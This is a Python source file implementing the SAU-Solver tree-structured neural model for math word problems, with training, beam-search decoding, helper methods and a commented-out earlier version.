from mwptoolkit.utils.utils import copy_list
from mwptoolkit.utils.enum_type import NumMask, SpecialTokens
class SAUSolver(nn.Module):
"""
Reference:
Qin et al. "Semantically-Aligned Universal Tree-Structured Solver for Math Word Problems" in EMNLP 2020.
"""
def __init__(self, config, dataset):
    """Build the SAU-Solver model from run configuration and dataset statistics.

    Args:
        config (dict): run configuration; keys read here: hidden_size, device,
            beam_size, max_output_len, embedding_size, dropout_ratio,
            num_layers, rnn_cell_type, loss_weight.
        dataset: preprocessed dataset providing in_idx2word, out_symbol2idx,
            out_idx2symbol, generate_list, num_start and operator_nums.
    """
    super(SAUSolver, self).__init__()
    # parameter
    self.hidden_size = config["hidden_size"]
    self.device = config["device"]
    self.USE_CUDA = True if self.device == torch.device('cuda') else False
    self.beam_size = config['beam_size']
    self.max_out_len = config['max_output_len']
    self.embedding_size = config["embedding_size"]
    self.dropout_ratio = config["dropout_ratio"]
    self.num_layers = config["num_layers"]
    self.rnn_cell_type = config["rnn_cell_type"]
    self.loss_weight = config['loss_weight']

    self.vocab_size = len(dataset.in_idx2word)
    self.out_symbol2idx = dataset.out_symbol2idx
    self.out_idx2symbol = dataset.out_idx2symbol
    generate_list = dataset.generate_list
    self.generate_nums = [self.out_symbol2idx[symbol] for symbol in generate_list]
    self.mask_list = NumMask.number
    self.num_start = dataset.num_start
    self.operator_nums = dataset.operator_nums
    self.generate_size = len(generate_list)

    self.unk_token = self.out_symbol2idx[SpecialTokens.UNK_TOKEN]
    # SOS/EOS/PAD may be absent from the output vocabulary depending on the
    # dataset; fall back to None.  Catch only KeyError — the original bare
    # `except:` also swallowed unrelated errors such as KeyboardInterrupt.
    try:
        self.out_sos_token = self.out_symbol2idx[SpecialTokens.SOS_TOKEN]
    except KeyError:
        self.out_sos_token = None
    try:
        self.out_eos_token = self.out_symbol2idx[SpecialTokens.EOS_TOKEN]
    except KeyError:
        self.out_eos_token = None
    try:
        self.out_pad_token = self.out_symbol2idx[SpecialTokens.PAD_TOKEN]
    except KeyError:
        self.out_pad_token = None

    # module
    self.embedder = BaiscEmbedder(self.vocab_size, self.embedding_size, self.dropout_ratio)
    self.encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type,
                                   self.dropout_ratio, batch_first=False)
    self.decoder = Prediction(self.hidden_size, self.operator_nums, self.generate_size, self.dropout_ratio)
    self.node_generater = GenerateNode(self.hidden_size, self.operator_nums, self.embedding_size,
                                       self.dropout_ratio)
    self.merge = Merge(self.hidden_size, self.embedding_size, self.dropout_ratio)
    self.sa = SemanticAlignmentModule(self.hidden_size, self.hidden_size, self.hidden_size)
    self.loss1 = MaskedCrossEntropyLoss()
def calculate_loss(self, batch_data):
    """Finish forward-propagating, calculating loss and back-propagation.

    Args:
        batch_data (dict): one batch data.

    Returns:
        float: loss value.
    """
    # Pull the tensors this training step needs out of the batch dict.
    question = batch_data["question"]
    question_lengths = batch_data["ques len"]
    number_stacks = batch_data["num stack"]
    number_sizes = batch_data["num size"]
    number_positions = batch_data["num pos"]
    equation = batch_data["equation"]
    equation_lengths = batch_data["equ len"]
    equation_mask = batch_data["equ mask"]
    number_lists = batch_data['num list']
    # train_tree runs the teacher-forced forward pass and backward().
    return self.train_tree(
        question, question_lengths, equation, equation_lengths,
        number_stacks, number_sizes, self.generate_nums,
        number_positions, self.unk_token, self.num_start)
def model_test(self, batch_data):
    """Model test.

    Args:
        batch_data (dict): one batch data.

    Returns:
        tuple(list,list): predicted equation, target equation.
    """
    # Pull the tensors this evaluation step needs out of the batch dict.
    question = batch_data["question"]
    question_lengths = batch_data["ques len"]
    number_stacks = batch_data["num stack"]
    number_sizes = batch_data["num size"]
    number_positions = batch_data["num pos"]
    equation = batch_data["equation"]
    equation_lengths = batch_data["equ len"]
    equation_mask = batch_data["equ mask"]
    number_lists = batch_data['num list']
    # Beam-search decode (evaluation runs with batch size 1).
    predicted_ids = self.evaluate_tree(
        question, question_lengths, self.generate_nums,
        number_positions, self.num_start, self.beam_size, self.max_out_len)
    # Map token ids back to output symbols for both prediction and target.
    prediction = self.convert_idx2symbol(predicted_ids, number_lists[0], copy_list(number_stacks[0]))
    ground_truth = self.convert_idx2symbol(equation[0], number_lists[0], copy_list(number_stacks[0]))
    return prediction, ground_truth
def train_tree(self,input_batch, input_length, target_batch, target_length, nums_stack_batch, num_size_batch, generate_nums, num_pos, unk, num_start,
               english=False,var_nums=[], batch_first=False):
    """Teacher-forced tree decoding for one batch; computes loss and calls backward().

    Loss = masked cross-entropy over node predictions
           + 0.01 * MSE semantic-alignment loss between each completed
             subtree embedding and its aligned encoder states.

    Returns:
        float: scalar loss value (gradients are left on the parameters;
        the optimizer step happens in the caller).

    NOTE(review): var_nums=[] is a mutable default argument; it is only read
    here, but worth confirming no caller mutates it.
    """
    # sequence mask for attention: 1 marks padding positions.
    seq_mask = []
    max_len = max(input_length)
    for i in input_length:
        seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
    seq_mask = torch.ByteTensor(seq_mask)

    num_mask = []
    # max number-position count + constant-number count + unknown-variable count
    max_num_size = max(num_size_batch) + len(generate_nums) + len(var_nums)
    for i in num_size_batch:
        d = i + len(generate_nums) + len(var_nums)
        num_mask.append([0] * d + [1] * (max_num_size - d))
    num_mask = torch.ByteTensor(num_mask)  # masks irrelevant number slots so invalid Nx tokens are not generated
    #unk = output_lang.word2index["UNK"]
    # Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
    input_var = input_batch.transpose(0, 1)
    target = target_batch.transpose(0, 1)
    padding_hidden = torch.FloatTensor([0.0 for _ in range(self.decoder.hidden_size)]).unsqueeze(0)
    batch_size = len(input_length)
    if self.USE_CUDA:
        input_var = input_var.cuda()
        seq_mask = seq_mask.cuda()
        padding_hidden = padding_hidden.cuda()
        num_mask = num_mask.cuda()
    # Zero gradients of both optimizers
    # Run words through encoder
    #encoder_outputs, problem_output = self.encoder(input_var, input_length)
    seq_emb = self.embedder(input_var)
    pade_outputs, _ = self.encoder(seq_emb, input_length)
    # Bidirectional RNN: sum the forward and backward halves of the hidden dim.
    problem_output = pade_outputs[-1, :, :self.hidden_size] + pade_outputs[0, :, self.hidden_size:]
    encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
    # Prepare input and output variables
    node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]  # root embedding B x 1
    max_target_length = max(target_length)

    all_node_outputs = []
    all_sa_outputs = []
    # all_leafs = []

    copy_num_len = [len(_) for _ in num_pos]
    num_size = max(copy_num_len)
    # gather the embeddings of the numbers that appear in each problem
    all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, batch_size, num_size,
                                                                   self.encoder.hidden_size)
    embeddings_stacks = [[] for _ in range(batch_size)]  # B x 1 current tree state / subtree embedding / output
    left_childs = [None for _ in range(batch_size)]  # B x 1
    for t in range(max_target_length):
        num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(
            node_stacks, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden, seq_mask, num_mask)

        # all_leafs.append(p_leaf)
        outputs = torch.cat((op, num_score), 1)
        all_node_outputs.append(outputs)

        # Resolve UNK targets to the best-scoring candidate number position.
        target_t, generate_input = self.generate_tree_input(target[t].tolist(), outputs, nums_stack_batch, num_start,
                                                            unk)
        target[t] = target_t
        if self.USE_CUDA:
            generate_input = generate_input.cuda()
        left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
        left_childs = []
        for idx, l, r, node_stack, i, o in zip(range(batch_size), left_child.split(1), right_child.split(1),
                                               node_stacks, target[t].tolist(), embeddings_stacks):
            if len(node_stack) != 0:
                node = node_stack.pop()
            else:
                left_childs.append(None)
                continue
            # unknowns are treated as numbers; SEP is treated as an operator
            if i < num_start:  # operator token
                node_stack.append(TreeNode(r))
                node_stack.append(TreeNode(l, left_flag=True))
                o.append(TreeEmbedding(node_label[idx].unsqueeze(0), terminal=False))
                # print(o[-1].embedding.size())
                # print(encoder_outputs[idx].size())
            else:  # number token
                current_num = current_nums_embeddings[idx, i - num_start].unsqueeze(0)
                # Merge completed operand pairs into subtree embeddings; each
                # merged subtree is semantically aligned against the encoder.
                while len(o) > 0 and o[-1].terminal:
                    sub_stree = o.pop()
                    op = o.pop()
                    current_num = self.merge(op.embedding, sub_stree.embedding, current_num)  # Subtree embedding
                    if batch_first:
                        encoder_mapping, decoder_mapping = self.sa(current_num, encoder_outputs[idx])
                    else:
                        temp_encoder_outputs = encoder_outputs.transpose(0, 1)
                        encoder_mapping, decoder_mapping = self.sa(current_num,temp_encoder_outputs[idx])
                    all_sa_outputs.append((encoder_mapping, decoder_mapping))
                o.append(TreeEmbedding(current_num, terminal=True))
            if len(o) > 0 and o[-1].terminal:
                left_childs.append(o[-1].embedding)
            else:
                left_childs.append(None)

    # all_leafs = torch.stack(all_leafs, dim=1)  # B x S x 2
    all_node_outputs = torch.stack(all_node_outputs, dim=1)  # B x S x N

    target = target.transpose(0, 1).contiguous()  # B x S
    if self.USE_CUDA:
        # all_leafs = all_leafs.cuda()
        all_node_outputs = all_node_outputs.cuda()
        target = target.cuda()
        new_all_sa_outputs = []
        for sa_pair in all_sa_outputs:
            new_all_sa_outputs.append((sa_pair[0].cuda(), sa_pair[1].cuda()))
        all_sa_outputs = new_all_sa_outputs
        target_length = torch.LongTensor(target_length).cuda()
    else:
        target_length = torch.LongTensor(target_length)

    semantic_alignment_loss = nn.MSELoss()
    total_semanti_alognment_loss = 0
    sa_len = len(all_sa_outputs)
    for sa_pair in all_sa_outputs:
        total_semanti_alognment_loss += semantic_alignment_loss(sa_pair[0], sa_pair[1])
    # print(total_semanti_alognment_loss)
    # NOTE(review): if no subtree was ever merged, sa_len is 0 and this
    # division raises ZeroDivisionError — confirm targets always contain
    # at least one number token.
    total_semanti_alognment_loss = total_semanti_alognment_loss / sa_len
    # print(total_semanti_alognment_loss)

    # op_target = target < num_start
    # loss_0 = masked_cross_entropy_without_logit(all_leafs, op_target.long(), target_length)
    loss = masked_cross_entropy(all_node_outputs, target,target_length) + 0.01 * total_semanti_alognment_loss
    # loss = loss_0 + loss_1
    loss.backward()
    # clip the grad
    # torch.nn.utils.clip_grad_norm_(encoder.parameters(), 5)
    # torch.nn.utils.clip_grad_norm_(predict.parameters(), 5)
    # torch.nn.utils.clip_grad_norm_(generate.parameters(), 5)

    # Update parameters with optimizers
    return loss.item()  # , loss_0.item(), loss_1.item()
def evaluate_tree(self, input_batch, input_length, generate_nums, num_pos, num_start, beam_size=5, max_length=30):
    """Beam-search decode one problem (batch size 1) into a prefix token-id list.

    Returns:
        list[int]: token ids of the best-scoring beam's output equation.
    """
    # NOTE(review): input_length is used here as a tensor size, which requires
    # an int, while train_tree treats it as a per-example length sequence —
    # confirm what model_test actually passes.
    seq_mask = torch.BoolTensor(1, input_length).fill_(0)
    # Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
    input_var = input_batch.transpose(0, 1)
    num_mask = torch.BoolTensor(1, len(num_pos[0]) + len(generate_nums)).fill_(0)
    padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0)
    batch_size = 1
    if self.USE_CUDA:
        input_var = input_var.cuda()
        seq_mask = seq_mask.cuda()
        padding_hidden = padding_hidden.cuda()
        num_mask = num_mask.cuda()
    # Run words through encoder
    seq_emb = self.embedder(input_var)
    pade_outputs, _ = self.encoder(seq_emb, input_length)
    # Bidirectional RNN: sum the forward and backward halves of the hidden dim.
    problem_output = pade_outputs[-1, :, :self.hidden_size] + pade_outputs[0, :, self.hidden_size:]
    encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]

    # Prepare input and output variables
    node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]

    num_size = len(num_pos[0])
    all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, batch_size, num_size,
                                                                   self.hidden_size)
    # B x P x N
    embeddings_stacks = [[] for _ in range(batch_size)]
    left_childs = [None for _ in range(batch_size)]
    beams = [TreeBeam(0.0, node_stacks, embeddings_stacks, left_childs, [])]
    for t in range(max_length):
        current_beams = []
        while len(beams) > 0:
            b = beams.pop()
            # A beam with an empty node stack has finished decoding.
            if len(b.node_stack[0]) == 0:
                current_beams.append(b)
                continue
            # left_childs = torch.stack(b.left_childs)
            left_childs = b.left_childs
            num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(b.node_stack,
                                                                                                       left_childs,
                                                                                                       encoder_outputs,
                                                                                                       all_nums_encoder_outputs,
                                                                                                       padding_hidden,
                                                                                                       seq_mask,
                                                                                                       num_mask)
            out_score = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
            # out_score = p_leaf * out_score
            topv, topi = out_score.topk(beam_size)
            # Expand this beam with each of the top-k candidate tokens.
            for tv, ti in zip(topv.split(1, dim=1), topi.split(1, dim=1)):
                current_node_stack = copy_list(b.node_stack)
                current_left_childs = []
                current_embeddings_stacks = copy_list(b.embedding_stack)
                current_out = copy.deepcopy(b.out)
                out_token = int(ti)
                current_out.append(out_token)
                node = current_node_stack[0].pop()
                if out_token < num_start:
                    # Operator: generate left/right children and push them
                    # (right first, so left is decoded next).
                    generate_input = torch.LongTensor([out_token])
                    if self.USE_CUDA:
                        generate_input = generate_input.cuda()
                    left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input,
                                                                              current_context)
                    current_node_stack[0].append(TreeNode(right_child))
                    current_node_stack[0].append(TreeNode(left_child, left_flag=True))
                    current_embeddings_stacks[0].append(TreeEmbedding(node_label[0].unsqueeze(0), False))
                else:
                    # Number: merge any completed operand pairs into subtree embeddings.
                    current_num = current_nums_embeddings[0, out_token - num_start].unsqueeze(0)
                    while len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
                        sub_stree = current_embeddings_stacks[0].pop()
                        op = current_embeddings_stacks[0].pop()
                        current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
                    current_embeddings_stacks[0].append(TreeEmbedding(current_num, True))
                if len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
                    current_left_childs.append(current_embeddings_stacks[0][-1].embedding)
                else:
                    current_left_childs.append(None)
                current_beams.append(TreeBeam(b.score + float(tv), current_node_stack, current_embeddings_stacks,
                                              current_left_childs, current_out))
        # Keep the best beam_size beams; stop once all of them have finished.
        beams = sorted(current_beams, key=lambda x: x.score, reverse=True)
        beams = beams[:beam_size]
        flag = True
        for b in beams:
            if len(b.node_stack[0]) != 0:
                flag = False
        if flag:
            break
    return beams[0].out
# def evaluate_tree(self, input_batch, input_length, generate_nums, num_pos, num_start, beam_size=5, max_length=30,var_nums=[]):
# # sequence mask for attention
# seq_mask = torch.ByteTensor(1, input_length).fill_(0)
# # Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
# input_var = torch.LongTensor(input_batch).unsqueeze(1)
#
# num_mask = torch.ByteTensor(1, len(num_pos) + len(generate_nums) + len(var_nums)).fill_(0)
#
# # Set to not-training mode to disable dropout
#
# padding_hidden = torch.FloatTensor([0.0 for _ in range(self.decoder.hidden_size)]).unsqueeze(0)
#
# batch_size = 1
#
# if self.USE_CUDA:
# input_var = input_var.cuda()
# seq_mask = seq_mask.cuda()
# padding_hidden = padding_hidden.cuda()
# num_mask = num_mask.cuda()
#
# # Run words through encoder
# encoder_outputs, problem_output = self.encoder(input_var, input_length)
#
# # Prepare input and output variables # # root embedding B x 1
# node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
#
# num_size = len(num_pos)
# # 提取与问题相关的数字embedding
# all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, [num_pos], batch_size, num_size,
# self.encoder.hidden_size)
# # B x P x N
# embeddings_stacks = [[] for _ in range(batch_size)]
# left_childs = [None for _ in range(batch_size)]
# beam_search=True
# if beam_search:
# beams = [TreeBeam(0.0, node_stacks, embeddings_stacks, left_childs, [])]
#
# for t in range(max_length):
# current_beams = []
# while len(beams) > 0:
# b = beams.pop()
# if len(b.node_stack[0]) == 0:
# current_beams.append(b)
# continue
# # left_childs = torch.stack(b.left_childs)
# left_childs = b.left_childs
#
# num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(
# b.node_stack, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden,
# seq_mask, num_mask)
#
# # leaf = p_leaf[:, 0].unsqueeze(1)
# # repeat_dims = [1] * leaf.dim()
# # repeat_dims[1] = op.size(1)
# # leaf = leaf.repeat(*repeat_dims)
# #
# # non_leaf = p_leaf[:, 1].unsqueeze(1)
# # repeat_dims = [1] * non_leaf.dim()
# # repeat_dims[1] = num_score.size(1)
# # non_leaf = non_leaf.repeat(*repeat_dims)
# #
# # p_leaf = torch.cat((leaf, non_leaf), dim=1)
# out_score = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
#
# # out_score = p_leaf * out_score
#
# topv, topi = out_score.topk(beam_size)
#
# # is_leaf = int(topi[0])
# # if is_leaf:
# # topv, topi = op.topk(1)
# # out_token = int(topi[0])
# # else:
# # topv, topi = num_score.topk(1)
# # out_token = int(topi[0]) + num_start
# for tv, ti in zip(topv.split(1, dim=1), topi.split(1, dim=1)):
# current_node_stack = copy_list(b.node_stack)
# current_left_childs = []
# current_embeddings_stacks = copy_list(b.embedding_stack)
# current_out = copy.deepcopy(b.out)
# out_token = int(ti)
# current_out.append(out_token)
#
# node = current_node_stack[0].pop()
#
# # var_num当时数字处理,SEP/;当操作符处理
# if out_token < num_start: # 非数字
# generate_input = torch.LongTensor([out_token])
# if self.USE_CUDA:
# generate_input = generate_input.cuda()
# left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input,
# current_context)
#
# current_node_stack[0].append(TreeNode(right_child))
# current_node_stack[0].append(TreeNode(left_child, left_flag=True))
#
# current_embeddings_stacks[0].append(TreeEmbedding(node_label[0].unsqueeze(0), False))
# else: # 数字
# current_num = current_nums_embeddings[0, out_token - num_start].unsqueeze(0)
#
# while len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
# sub_stree = current_embeddings_stacks[0].pop()
# op = current_embeddings_stacks[0].pop()
# current_num = self.merge(op.embedding, sub_stree.embedding, current_num)
# current_embeddings_stacks[0].append(TreeEmbedding(current_num, True))
# if len(current_embeddings_stacks[0]) > 0 and current_embeddings_stacks[0][-1].terminal:
# current_left_childs.append(current_embeddings_stacks[0][-1].embedding)
# else:
# current_left_childs.append(None)
# current_beams.append(
# TreeBeam(b.score + float(tv), current_node_stack, current_embeddings_stacks,
# current_left_childs, current_out))
# beams = sorted(current_beams, key=lambda x: x.score, reverse=True)
# beams = beams[:beam_size]
# flag = True
# for b in beams:
# if len(b.node_stack[0]) != 0:
# flag = False
# if flag:
# break
#
# return beams[0].out
# else:
# all_node_outputs = []
# for t in range(max_length):
# num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(
# node_stacks, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden,
# seq_mask, num_mask)
#
# out_scores = nn.functional.log_softmax(torch.cat((op, num_score), dim=1), dim=1)
# out_tokens = torch.argmax(out_scores, dim=1) # B
# all_node_outputs.append(out_tokens)
# left_childs = []
# for idx, node_stack, out_token, embeddings_stack in zip(range(batch_size), node_stacks, out_tokens,
# embeddings_stacks):
# # node = node_stack.pop()
# if len(node_stack) != 0:
# node = node_stack.pop()
# else:
# left_childs.append(None)
# continue
# # var_num当时数字处理,SEP/;当操作符处理
# if out_token < num_start: # 非数字
# generate_input = torch.LongTensor([out_token])
# if self.USE_CUDA:
# generate_input = generate_input.cuda()
# left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input,
# current_context)
# node_stack.append(TreeNode(right_child))
# node_stack.append(TreeNode(left_child, left_flag=True))
# embeddings_stack.append(TreeEmbedding(node_label.unsqueeze(0), False))
# else: # 数字
# current_num = current_nums_embeddings[idx, out_token - num_start].unsqueeze(0)
# while len(embeddings_stack) > 0 and embeddings_stack[-1].terminal:
# sub_stree = embeddings_stack.pop()
# op = embeddings_stack.pop()
# current_num = self.merge(op.embedding.squeeze(0), sub_stree.embedding, current_num)
# embeddings_stack.append(TreeEmbedding(current_num, terminal=True))
#
# if len(embeddings_stack) > 0 and embeddings_stack[-1].terminal:
# left_childs.append(embeddings_stack[-1].embedding)
# else:
# left_childs.append(None)
#
# # all_leafs = torch.stack(all_leafs, dim=1) # B x S x 2
# all_node_outputs = torch.stack(all_node_outputs, dim=1) # B x S x N
# all_node_outputs = all_node_outputs.cpu().numpy()
# return all_node_outputs[0]
def get_all_number_encoder_outputs(self, encoder_outputs, num_pos, batch_size, num_size, hidden_size):
indices = list()
sen_len = encoder_outputs.size(0)
masked_index = []
temp_1 = [1 for _ in range(hidden_size)]
temp_0 = [0 for _ in range(hidden_size)]
for b in range(batch_size):
for i in num_pos[b]:
indices.append(i + b * sen_len)
masked_index.append(temp_0)
indices += [0 for _ in range(len(num_pos[b]), num_size)]
masked_index += [temp_1 for _ in range(len(num_pos[b]), num_size)]
indices = torch.LongTensor(indices)
masked_index = torch.BoolTensor(masked_index)
masked_index = masked_index.view(batch_size, num_size, hidden_size)
if self.USE_CUDA:
indices = indices.cuda()
masked_index = masked_index.cuda()
all_outputs = encoder_outputs.transpose(0, 1).contiguous()
all_embedding = all_outputs.view(-1, encoder_outputs.size(2)) # S x B x H -> (B x S) x H
all_num = all_embedding.index_select(0, indices)
all_num = all_num.view(batch_size, num_size, hidden_size)
return all_num.masked_fill_(masked_index, 0.0)
def generate_tree_input(self, target, decoder_output, nums_stack_batch, num_start, unk):
# when the decoder input is copied num but the num has two pos, chose the max
target_input = copy.deepcopy(target)
for i in range(len(target)):
if target[i] == unk:
num_stack = nums_stack_batch[i].pop()
max_score = -float("1e12")
for num in num_stack:
if decoder_output[i, num_start + num] > max_score:
target[i] = num + num_start
max_score = decoder_output[i, num_start + num]
if target_input[i] >= num_start:
target_input[i] = 0
return torch.LongTensor(target), torch.LongTensor(target_input)
def mse_loss(self, outputs, targets, mask=None):
# outputs : [batch_size,output_len,hidden_size]
# targets : [batch_size,output_len,hidden_size]
# mask : [batch_size,output_len]
mask = mask.to(self.device)
x = torch.sqrt(torch.sum(torch.square((outputs - targets)), dim=-1)) # [batch_size,output_len]
y = torch.sum(x * mask, dim=-1) / torch.sum(mask, dim=-1) # [batch_size]
return torch.sum(y)
def convert_idx2symbol(self, output, num_list, num_stack):
# batch_size=output.size(0)
'''batch_size=1'''
seq_len = len(output)
num_len = len(num_list)
output_list = []
res = []
for s_i in range(seq_len):
idx = output[s_i]
if idx in [self.out_sos_token, self.out_eos_token, self.out_pad_token]:
break
symbol = self.out_idx2symbol[idx]
if "NUM" in symbol:
num_idx = self.mask_list.index(symbol)
if num_idx >= num_len:
res = []
break
res.append(num_list[num_idx])
elif symbol == SpecialTokens.UNK_TOKEN:
try:
pos_list = num_stack.pop()
c = num_list[pos_list[0]]
res.append(c)
except:
return None
else:
res.append(symbol)
output_list.append(res)
return output_list
# class SAUSolver(nn.Module):
# """
# Reference:
# Qin et al. "Semantically-Aligned Universal Tree-Structured Solver for Math Word Problems" in EMNLP 2020.
# """
# def __init__(self, config, dataset):
# super(SAUSolver,self).__init__()
# #parameter
# self.hidden_size = config["hidden_size"]
# self.device = config["device"]
# self.USE_CUDA = True if self.device == torch.device('cuda') else False
# self.beam_size = config['beam_size']
# self.max_out_len = config['max_output_len']
# self.embedding_size = config["embedding_size"]
# self.dropout_ratio = config["dropout_ratio"]
# self.num_layers = config["num_layers"]
# self.rnn_cell_type = config["rnn_cell_type"]
# self.loss_weight = config['loss_weight']
#
# self.vocab_size = len(dataset.in_idx2word)
# self.out_symbol2idx = dataset.out_symbol2idx
# self.out_idx2symbol = dataset.out_idx2symbol
# generate_list = dataset.generate_list
# self.generate_nums = [self.out_symbol2idx[symbol] for symbol in generate_list]
# self.mask_list = NumMask.number
# self.num_start = dataset.num_start
# self.operator_nums = dataset.operator_nums
# self.generate_size = len(generate_list)
#
# self.unk_token = self.out_symbol2idx[SpecialTokens.UNK_TOKEN]
# try:
# self.out_sos_token = self.out_symbol2idx[SpecialTokens.SOS_TOKEN]
# except:
# self.out_sos_token = None
# try:
# self.out_eos_token = self.out_symbol2idx[SpecialTokens.EOS_TOKEN]
# except:
# self.out_eos_token = None
# try:
# self.out_pad_token = self.out_symbol2idx[SpecialTokens.PAD_TOKEN]
# except:
# self.out_pad_token = None
# #module
# self.embedder = BaiscEmbedder(self.vocab_size, self.embedding_size, self.dropout_ratio)
# #self.t_encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type, self.dropout_ratio)
# self.encoder = BasicRNNEncoder(self.embedding_size, self.hidden_size, self.num_layers, self.rnn_cell_type, self.dropout_ratio, batch_first=False)
# self.decoder = SARTreeDecoder(self.hidden_size, self.operator_nums, self.generate_size, self.dropout_ratio)
# self.node_generater = GenerateNode(self.hidden_size, self.operator_nums, self.embedding_size, self.dropout_ratio)
# self.merge = Merge(self.hidden_size, self.embedding_size, self.dropout_ratio)
#
# self.loss1 = MaskedCrossEntropyLoss()
# #
# def calculate_loss(self, batch_data):
# """Finish forward-propagating, calculating loss and back-propagation.
#
# Args:
# batch_data (dict): one batch data.
#
# Returns:
# float: loss value.
# """
# seq = batch_data["question"]
# seq_length = batch_data["ques len"]
# nums_stack = batch_data["num stack"]
# num_size = batch_data["num size"]
# num_pos = batch_data["num pos"]
# target = batch_data["equation"]
# target_length = batch_data["equ len"]
# equ_mask = batch_data["equ mask"]
# num_list = batch_data['num list']
# generate_nums = self.generate_nums
# num_start = self.num_start
# # sequence mask for attention
# unk = self.unk_token
#
# loss = self.train_tree(seq,seq_length,target,target_length,\
# nums_stack,num_size,generate_nums,num_pos,unk,num_start)
# return loss
#
# def model_test(self, batch_data):
# """Model test.
#
# Args:
# batch_data (dict): one batch data.
#
# Returns:
# tuple(list,list): predicted equation, target equation.
# """
# seq = batch_data["question"]
# seq_length = batch_data["ques len"]
# nums_stack = batch_data["num stack"]
# num_size = batch_data["num size"]
# num_pos = batch_data["num pos"]
# target = batch_data["equation"]
# target_length = batch_data["equ len"]
# equ_mask = batch_data["equ mask"]
# num_list = batch_data['num list']
# generate_nums = self.generate_nums
# num_start = self.num_start
# # sequence mask for attention
# all_node_output = self.evaluate_tree(seq, seq_length, generate_nums, num_pos, num_start, self.beam_size, self.max_out_len)
#
# all_output = self.convert_idx2symbol(all_node_output, num_list[0], copy_list(nums_stack[0]))
# targets = self.convert_idx2symbol(target[0], num_list[0], copy_list(nums_stack[0]))
# return all_output, targets
#
# def train_tree(self, input_batch, input_length, target_batch, target_length, nums_stack_batch, num_size_batch, generate_nums, num_pos, unk, num_start, english=False):
# # sequence mask for attention
# seq_mask = []
# max_len = max(input_length)
# for i in input_length:
# seq_mask.append([0 for _ in range(i)] + [1 for _ in range(i, max_len)])
# seq_mask = torch.BoolTensor(seq_mask)
#
# num_mask = []
# max_num_size = max(num_size_batch) + len(generate_nums)
# for i in num_size_batch:
# d = i + len(generate_nums)
# num_mask.append([0] * d + [1] * (max_num_size - d))
# num_mask = torch.BoolTensor(num_mask)
#
# # Turn padded arrays into (batch_size x max_len) tensors, transpose into (max_len x batch_size)
# input_var = input_batch.transpose(0, 1)
#
# target = target_batch.transpose(0, 1)
#
# padding_hidden = torch.FloatTensor([0.0 for _ in range(self.hidden_size)]).unsqueeze(0)
# batch_size = len(input_length)
#
# if self.USE_CUDA:
# input_var = input_var.cuda()
# seq_mask = seq_mask.cuda()
# padding_hidden = padding_hidden.cuda()
# num_mask = num_mask.cuda()
#
# # Run words through encoder
# seq_emb = self.embedder(input_var)
# pade_outputs, _ = self.encoder(seq_emb, input_length)
# problem_output = pade_outputs[-1, :, :self.hidden_size] + pade_outputs[0, :, self.hidden_size:]
# encoder_outputs = pade_outputs[:, :, :self.hidden_size] + pade_outputs[:, :, self.hidden_size:]
# # Prepare input and output variables
# node_stacks = [[TreeNode(_)] for _ in problem_output.split(1, dim=0)]
#
# max_target_length = max(target_length)
#
# all_node_outputs = []
# # all_leafs = []
# sub_tree_outputs = []
# sub_tree_target = []
# sub_tree_mask = []
#
# copy_num_len = [len(_) for _ in num_pos]
# num_size = max(copy_num_len)
# all_nums_encoder_outputs = self.get_all_number_encoder_outputs(encoder_outputs, num_pos, batch_size, num_size, self.hidden_size)
#
# embeddings_stacks = [[] for _ in range(batch_size)]
# left_childs = [None for _ in range(batch_size)]
# for t in range(max_target_length):
# num_score, op, current_embeddings, current_context, current_nums_embeddings = self.decoder(node_stacks, left_childs, encoder_outputs, all_nums_encoder_outputs, padding_hidden, seq_mask,
# num_mask)
#
# # all_leafs.append(p_leaf)
# outputs = torch.cat((op, num_score), 1)
# all_node_outputs.append(outputs)
#
# target_t, generate_input = self.generate_tree_input(target[t].tolist(), outputs, nums_stack_batch, num_start, unk)
# target[t] = target_t
# if self.USE_CUDA:
# generate_input = generate_input.cuda()
# left_child, right_child, node_label = self.node_generater(current_embeddings, generate_input, current_context)
# left_childs = []
# sub_tree_emb = []
# loss_mask = []
# for idx, l, r, node_stack, i, o in zip(range(batch_size), left_child.split(1), right_child.split(1), node_stacks, target[t].tolist(), embeddings_stacks):
# if len(node_stack) != 0:
# node = node_stack.pop()
# else:
# left_childs.append(None)
# sub_tree_emb.append(padding_hidden)
# loss_mask.append(torch.zeros(1, dtype=torch.float))
# continue
#
# if i < num_start:
# node_stack.append(TreeNode(r))
# node_stack.append(TreeNode(l, left_flag=True))
